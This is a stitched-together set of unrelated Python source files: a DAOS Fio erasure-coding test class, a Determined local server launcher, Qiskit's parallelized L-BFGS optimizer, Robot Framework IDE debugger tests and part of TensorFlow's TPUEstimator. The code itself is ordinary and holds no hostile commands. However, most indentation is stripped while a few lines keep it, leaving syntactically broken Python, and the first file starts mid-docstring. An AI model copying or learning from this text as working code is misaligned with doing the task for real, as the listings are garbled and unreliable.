Class to use for EC testing with Fio Benchmark.
"""
def __init__(self, *args, **kwargs):
"""Initialize a FioBase object."""
super().__init__(*args, **kwargs)
self.server_count = None
self.set_online_rebuild = False
self.rank_to_kill = None
def setUp(self):
"""Set up each test case."""
super().setUp()
engine_count = self.server_managers[0].get_config_value("engines_per_host")
self.server_count = len(self.hostlist_servers) * engine_count
# Create Pool
self.add_pool()
self.out_queue = queue.Queue()
def stop_job_managers(self):
"""Cleanup dfuse in case of test failure."""
error_list = []
dfuse_cleanup_cmd = ["pkill dfuse --signal KILL",
"fusermount3 -uz {}".format(self.dfuse.mount_dir.value)]
for cmd in dfuse_cleanup_cmd:
results = run_pcmd(self.hostlist_clients, cmd)
for result in results:
if result["exit_status"] != 0:
                    error_list.append("Errors detected during cleanup cmd %s on node %s"
                                      % (cmd, str(result["hosts"])))
error_list.extend(super().stop_job_managers())
return error_list
def write_single_fio_dataset(self, results):
"""Run Fio Benchmark.
Args:
results (queue): queue for returning thread results
"""
try:
self.execute_fio(stop_dfuse=False)
if results is not None:
results.put("PASS")
except (CommandFailure, DaosApiError, DaosTestError):
if results is not None:
results.put("FAIL")
raise
def start_online_fio(self):
"""Run Fio operation with thread in background. Trigger the server failure while Fio is
running
"""
# Create the Fio run thread
job = threading.Thread(target=self.write_single_fio_dataset,
kwargs={"results": self.out_queue})
# Launch the Fio thread
job.start()
# Kill the server rank while IO operation in progress
if self.set_online_rebuild:
time.sleep(30)
# Kill the server rank
if self.rank_to_kill is not None:
self.server_managers[0].stop_ranks([self.rank_to_kill],
self.d_log,
force=True)
# Wait to finish the thread
job.join()
# Verify the queue result and make sure test has no failure
while not self.out_queue.empty():
if self.out_queue.get() == "FAIL":
self.fail("FAIL")
|
run-server.py
|
import multiprocessing as mp
import socket
import subprocess
import sys
import time
from typing import Callable, List, Optional
# While we could use something like requests (or any other 3rd-party module),
# this script aims to work with the default Python 3.6+.
CLEAR = "\033[39m"
MAGENTA = "\033[95m"
BLUE = "\033[94m"
DB_PORT = 5433
MASTER_PORT = 8081
def kill_process(name: str, process: Optional[mp.Process]) -> None:
if process is not None and process.is_alive():
try:
process.terminate()
except Exception:
print(f"failed to kill process: {name}")
def wait_for_server(port: int, host: str = "localhost", timeout: float = 5.0) -> None:
for _ in range(100):
try:
with socket.create_connection((host, port), timeout=timeout):
return
except OSError:
time.sleep(1)
    print(f"Timed out waiting for {host}:{port}.")
def proc(name: str, cmd: List[str], logs_handler: Callable = lambda x: x) -> mp.Process:
def func() -> None:
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as p:
try:
assert p.stdout is not None
for line in p.stdout:
print(logs_handler(line.decode("utf8")), end="", flush=True)
except KeyboardInterrupt:
print(f"Killing Log stream for {name}")
return mp.Process(target=func, daemon=True)
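# A minimal usage sketch (hypothetical command; prefixes every streamed log line):
#
#   p = proc("echo", ["echo", "hello"], logs_handler=lambda line: f"[echo] {line}")
#   p.start()
#   p.join()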
def tail_db_logs() -> mp.Process:
return proc("database-logs", ["docker-compose", "logs", "-f"])
def run_master() -> mp.Process:
return proc(
"master",
["../../../master/build/determined-master", "--config-file", "master.yaml"],
logs_handler=lambda line: f"{MAGENTA}determined-master |{CLEAR} {line}",
)
def run_agent() -> mp.Process:
container_master_host = "host.docker.internal" if sys.platform == "darwin" else ""
return proc(
"agent",
[
"../../../agent/build/determined-agent",
"run",
"--config-file",
"agent.yaml",
"--container-master-host",
container_master_host,
],
logs_handler=lambda line: f"{BLUE}determined-agent |{CLEAR} {line}",
)
def is_db_running() -> bool:
try:
        with socket.create_connection(("localhost", DB_PORT), timeout=0.5):
return True
except OSError:
return False
def main() -> None:
db, master, agent, db_logs = False, None, None, None
try:
master = run_master()
agent = run_agent()
db_logs = tail_db_logs()
if not is_db_running():
db = True
subprocess.check_call(["docker-compose", "up", "-d"])
            wait_for_server(DB_PORT)
db_logs.start()
master.start()
wait_for_server(MASTER_PORT)
agent.start()
# Join the agent first so we can exit if the agent fails to connect to
# the master.
agent.join()
if agent.exitcode != 0:
raise Exception(f"agent failed with non-zero exit code {agent.exitcode}")
master.join()
db_logs.join()
except KeyboardInterrupt:
pass
finally:
kill_process("master", master)
kill_process("agent", agent)
kill_process("db-logs", db_logs)
if db:
subprocess.check_call(["docker-compose", "down"])
if __name__ == "__main__":
main()
|
p_bfgs.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Parallelized Limited-memory BFGS optimizer"""
import logging
import multiprocessing
import platform
import warnings
from typing import Optional, List, Tuple, Callable
import numpy as np
from qiskit.utils import algorithm_globals
from qiskit.utils.validation import validate_min
from .optimizer import OptimizerResult, POINT
from .scipy_optimizer import SciPyOptimizer
logger = logging.getLogger(__name__)
class P_BFGS(SciPyOptimizer): # pylint: disable=invalid-name
"""
Parallelized Limited-memory BFGS optimizer.
P-BFGS is a parallelized version of :class:`L_BFGS_B` with which it shares the same parameters.
P-BFGS can be useful when the target hardware is a quantum simulator running on a classical
machine. This allows the multiple processes to use simulation to potentially reach a minimum
faster. The parallelization may also help the optimizer avoid getting stuck at local optima.
Uses scipy.optimize.fmin_l_bfgs_b.
For further detail, please refer to
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
"""
_OPTIONS = ["maxfun", "ftol", "iprint"]
# pylint: disable=unused-argument
def __init__(
self,
maxfun: int = 1000,
ftol: float = 10 * np.finfo(float).eps,
factr: Optional[float] = None,
iprint: int = -1,
max_processes: Optional[int] = None,
options: Optional[dict] = None,
max_evals_grouped: int = 1,
**kwargs,
) -> None:
r"""
Args:
maxfun: Maximum number of function evaluations.
ftol: The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,\|f\^{k+1}\|,1} <= ftol.
factr : (DEPRECATED) The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,
\|f\^{k+1}|,1} <= factr * eps, where eps is the machine precision,
which is automatically generated by the code. Typical values for
factr are: 1e12 for low accuracy; 1e7 for moderate accuracy;
10.0 for extremely high accuracy. See Notes for relationship to ftol,
which is exposed (instead of factr) by the scipy.optimize.minimize
interface to L-BFGS-B.
iprint: Controls the frequency of output. iprint < 0 means no output;
iprint = 0 print only one line at the last iteration; 0 < iprint < 99
print also f and \|proj g\| every iprint iterations; iprint = 99 print
details of every iteration except n-vectors; iprint = 100 print also the
changes of active set and final x; iprint > 100 print details of
every iteration including x and g.
max_processes: maximum number of processes allowed, has a min. value of 1 if not None.
options: A dictionary of solver options.
max_evals_grouped: Max number of default gradient evaluations performed simultaneously.
kwargs: additional kwargs for scipy.optimize.minimize.
"""
if max_processes:
validate_min("max_processes", max_processes, 1)
if factr is not None:
warnings.warn(
"P_BFGS.__init__() keyword argument factr is deprecated and replaced with ftol. "
"The relationship between the two is ftol = factr * numpy.finfo(float).eps. "
"See https://docs.scipy.org/doc/scipy/reference/optimize.minimize-lbfgsb.html.",
DeprecationWarning,
stacklevel=2,
)
ftol = factr * np.finfo(float).eps
if options is None:
options = {}
for k, v in list(locals().items()):
if k in self._OPTIONS:
options[k] = v
super().__init__(
method="L-BFGS-B",
options=options,
max_evals_grouped=max_evals_grouped,
**kwargs,
)
self._max_processes = max_processes
def optimize(
self,
num_vars,
objective_function,
gradient_function=None,
variable_bounds=None,
initial_point=None,
):
warnings.warn(
"The P_BFGS.optimize method is deprecated as of Qiskit Terra "
"0.19.0 and will be removed no sooner than 3 months after the release date. "
"Instead, use the P_BFGS.minimize method, which mimics the "
"signature of scipy.optimize.minimize.",
DeprecationWarning,
stacklevel=2,
)
result = self.minimize(
objective_function, initial_point, gradient_function, variable_bounds
)
return result.x, result.fun, result.nfev
def minimize(
self,
fun: Callable[[POINT], float],
x0: POINT,
jac: Optional[Callable[[POINT], POINT]] = None,
bounds: Optional[List[Tuple[float, float]]] = None,
) -> OptimizerResult:
x0 = np.asarray(x0)
num_procs = multiprocessing.cpu_count() - 1
num_procs = (
num_procs if self._max_processes is None else min(num_procs, self._max_processes)
)
num_procs = num_procs if num_procs >= 0 else 0
if platform.system() == "Darwin":
# Changed in version 3.8: On macOS, the spawn start method is now the
# default. The fork start method should be considered unsafe as it can
# lead to crashes.
# However P_BFGS doesn't support spawn, so we revert to single process.
            major, minor, _ = platform.python_version_tuple()
            # Compare numerically; string comparison breaks for minor versions >= 10.
            if (int(major), int(minor)) >= (3, 8):
num_procs = 0
logger.warning(
"For MacOS, python >= 3.8, using only current process. "
"Multiple core use not supported."
)
elif platform.system() == "Windows":
num_procs = 0
logger.warning(
"For Windows, using only current process. Multiple core use not supported."
)
queue = multiprocessing.Queue()
# TODO: are automatic bounds a good idea? What if the circuit parameters are not
# just from plain Pauli rotations but have a coefficient?
# bounds for additional initial points in case bounds has any None values
threshold = 2 * np.pi
if bounds is None:
bounds = [(-threshold, threshold)] * x0.size
low = [(l if l is not None else -threshold) for (l, u) in bounds]
high = [(u if u is not None else threshold) for (l, u) in bounds]
def optimize_runner(_queue, _i_pt): # Multi-process sampling
_sol, _opt, _nfev = self._optimize(fun, _i_pt, jac, bounds)
_queue.put((_sol, _opt, _nfev))
# Start off as many other processes running the optimize (can be 0)
processes = []
for _ in range(num_procs):
i_pt = algorithm_globals.random.uniform(low, high) # Another random point in bounds
proc = multiprocessing.Process(target=optimize_runner, args=(queue, i_pt))
processes.append(proc)
proc.start()
# While the one optimize in this process below runs the other processes will
# be running too. This one runs
# with the supplied initial point. The process ones have their own random one
sol, opt, nfev = self._optimize(fun, x0, jac, bounds)
for proc in processes:
# For each other process we wait now for it to finish and see if it has
# a better result than above
proc.join()
p_sol, p_opt, p_nfev = queue.get()
if p_opt < opt:
sol, opt = p_sol, p_opt
nfev += p_nfev
result = OptimizerResult()
result.x = sol
result.fun = opt
result.nfev = nfev
return result
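    # A minimal usage sketch (assumption: a simple quadratic objective, no bounds):
    #
    #   opt = P_BFGS(maxfun=100, max_processes=2)
    #   result = opt.minimize(fun=lambda x: float(np.sum(x ** 2)), x0=np.array([1.0, -1.0]))
    #   print(result.x, result.fun, result.nfev)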
def _optimize(
self,
objective_function,
initial_point,
gradient_function=None,
variable_bounds=None,
):
result = super().minimize(
objective_function, initial_point, gradient_function, variable_bounds
)
return result.x, result.fun, result.nfev
|
test_debugger.py
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
import threading
import unittest
import time
from robotide.contrib.testrunner.TestRunnerAgent import RobotDebugger
class TestDebugger(unittest.TestCase):
def setUp(self):
self._debugger = RobotDebugger()
def test_pausing_and_resuming(self):
self.assertFalse(self._debugger.is_paused())
self._debugger.pause()
self.assertTrue(self._debugger.is_paused())
self._debugger.resume()
self.assertFalse(self._debugger.is_paused())
def test_is_breakpoint(self):
self.assertTrue(self._debugger.is_breakpoint('BuiltIn.Comment', {'args':['PAUSE']}))
self.assertFalse(self._debugger.is_breakpoint('BuiltIn.Log', {'args':['PAUSE']}))
self.assertFalse(self._debugger.is_breakpoint('BuiltIn.Comment', {'args':['Something']}))
self.assertFalse(self._debugger.is_breakpoint('Foo', {'args':[]}))
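    # The stepping tests below run the instrumented test body in a daemon thread
    # (see the execution() context manager) while the main thread drives the
    # debugger with step_next()/step_over()/resume() and waits on Events to see
    # how far execution has progressed.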
def test_step_next(self):
self._debugger.pause()
started = threading.Event()
first_keyword_done = threading.Event()
second_keyword_done = threading.Event()
third_keyword_done = threading.Event()
wait_for_step_next_before_entering_debugger = threading.Event()
def test_execution():
started.set()
with self.kw():
first_keyword_done.set()
wait_for_step_next_before_entering_debugger.wait()
with self.kw():
second_keyword_done.set()
with self.kw():
third_keyword_done.set()
with self.execution(test_execution):
self._verify_done(started)
self.assertFalse(first_keyword_done.isSet())
self._debugger.step_next()
self._verify_done(first_keyword_done)
self.assertFalse(second_keyword_done.isSet())
self._debugger.step_next()
wait_for_step_next_before_entering_debugger.set()
self._verify_done(second_keyword_done)
self.assertFalse(third_keyword_done.isSet())
self._debugger.step_next()
self._verify_done(third_keyword_done)
def _verify_done(self, event):
self.assertTrue(event.wait(timeout=5.0) or event.isSet())
@contextmanager
def kw(self, passes=True):
self._debugger.start_keyword()
yield
self._debugger.end_keyword(passes)
@contextmanager
def execution(self, executed):
t = threading.Thread(target=executed)
t.setDaemon(True)
t.start()
yield
t.join()
def test_step_over(self):
self._debugger.pause()
started = threading.Event()
first_keyword_done = threading.Event()
second_keyword_done = threading.Event()
third_keyword_done = threading.Event()
last_keyword_done = threading.Event()
def test_execution():
started.set()
with self.kw():
first_keyword_done.set()
with self.kw():
with self.kw():
pass
with self.kw():
pass
second_keyword_done.set()
with self.kw():
third_keyword_done.set()
with self.kw():
last_keyword_done.set()
with self.execution(test_execution):
self._verify_done(started)
self.assertFalse(first_keyword_done.isSet())
self._debugger.step_next()
self._verify_done(first_keyword_done)
self.assertFalse(second_keyword_done.isSet())
self._debugger.step_over()
self._verify_done(second_keyword_done)
self.assertFalse(third_keyword_done.isSet())
self._debugger.step_over()
self._verify_done(third_keyword_done)
self.assertFalse(last_keyword_done.isSet())
self._debugger.step_over()
self._verify_done(last_keyword_done)
def test_pause_on_failure(self):
self._debugger.pause_on_failure(True)
before_failure = threading.Event()
after_failure = threading.Event()
def test_execution():
with self.kw():
pass
with self.kw():
pass
before_failure.set()
with self.kw(False):
pass
with self.kw():
pass
after_failure.set()
with self.execution(test_execution):
self._verify_done(before_failure)
self.assertFalse(after_failure.isSet())
self._debugger.resume()
time.sleep(0)
self._verify_done(after_failure)
if __name__ == '__main__':
unittest.main()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import os
import signal
import threading
import time
import traceback
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import session_support
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator import util as estimator_util
from tensorflow.python.estimator.export import export_output as export_output_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_REWRITE_FOR_INFERENCE_MODE = '_rewrite_for_inference'
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops():
# Gets the variables back from TPU nodes. This means the variables updated
# by TPU will now be *synced* to host memory.
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU
system before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
  See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
  `export_outputs`.
  For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
@{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
  TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with @{tf.contrib.summary.create_file_writer}.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=hooks,
evaluation_hooks=hooks,
prediction_hooks=hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
    logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
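# A hedged sketch of how the queue context above is typically driven (names
# below are illustrative, mirroring TPUInfeedOutfeedSessionHook further down):
#
#   controller = _OpQueueContext('InfeedController', target=run_infeed,
#                                args=(session,))
#   controller.send_next_batch_signal(iterations)  # run `iterations` steps
#   ...
#   controller.join()  # puts _SIGNAL.STOP and waits for the worker to exit
#
# The worker thread iterates over `read_iteration_counts()`, which yields each
# positive iteration count and returns once it sees _SIGNAL.STOP.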
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=True):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._session_cancel_timer = None
self._feed_error = None
self._finished = False
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
self._init_ops = [tpu.initialize_system(job=self._master_job)]
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _log_error(self, session, error):
"""Log an infeed or outfeed error.
This logs a short error message immediately, and schedules a timer to
emit the full stack trace and error message after a short period of time.
If the main session has terminated by the time the timer triggers, we
assume the real source of the error was from the main session and avoid
emitting a stack trace for the infeed.
Args:
      session: `tf.Session`, the session to be terminated.
      error: the Exception that triggered the logging.
"""
logging.warning(
'\n\n'
'Error occurred during infeed/outfeed. This may be due to a compile '
'error in the main session. Waiting for a short time for the main '
'session to come back.\n\n%s', error)
self._feed_error = traceback.format_exc()
# If we've already encountered a feed error, don't schedule another
# cancellation op.
if self._session_cancel_timer:
return
def _cancel_session():
      # Close the session to prevent the main thread from hanging. If the input
      # pipeline triggers any error, the infeed thread dies but the main thread
      # for TPU computation waits on the infeed enqueue forever. Closing the
      # Session cancels the main thread's Session.run execution.
#
      # We sleep for a few seconds before closing to give any TPU compilation
      # error some time to propagate from the TPU to the CPU
      # host. Compilation errors should be reported by the main thread so that
# the program can be interrupted and users can take action. Due to a race
# condition, the infeed thread might see an error first. Closing the
# session here immediately would result in a session cancellation
# exception in the main thread, instead of the expected compile error.
# User code that depends on having the proper exception type will
# therefore be confused.
time.sleep(5)
# If the main session is still running, the infeed/outfeed errors are
# legitimate, and should be logged.
if not self._finished and self._feed_error:
logging.error('Feed error: %s', self._feed_error)
logging.error('Closing session. A RuntimeError should follow.')
session.close()
self._session_cancel_timer = threading.Thread(target=_cancel_session)
self._session_cancel_timer.daemon = True
self._session_cancel_timer.start()
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
      logging.info('Infeed thread sleeping for %d seconds.',
                   self._initial_infeed_sleep_secs)
      time.sleep(self._initial_infeed_sleep_secs)
      logging.info('Infeed thread starting after sleep.')
try:
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
try:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
logging.info('Outfeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def after_create_session(self, session, coord):
logging.info('Init TPU system')
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
def before_run(self, run_context):
self._feed_error = None
# Wait for the cancellation timer to complete before continuing.
if self._session_cancel_timer:
self._session_cancel_timer.join()
self._session_cancel_timer = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
if self._session_cancel_timer:
logging.warning('Feed error occurred; waiting for message.')
self._session_cancel_timer.join()
self._finished = True
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
    logging.info('Stop outfeed thread controller')
self._outfeed_controller.join()
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=False)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
